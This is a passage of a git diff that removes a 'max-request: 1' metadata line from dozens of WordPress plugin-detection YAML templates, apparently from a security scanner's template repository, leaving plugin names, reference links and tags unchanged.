b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: - max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index dafe6974f6..3743307dbc 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: - max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index ba05fb1e16..a4c6980041 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: - max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index a038adac53..e085f30e5a 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: - max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 7f98d822a8..adf3387ddb 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: - max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 89602f4264..eb6e1aaa5d 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: - max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index 2f6513ca42..b3c83cd0bf 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: - max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git 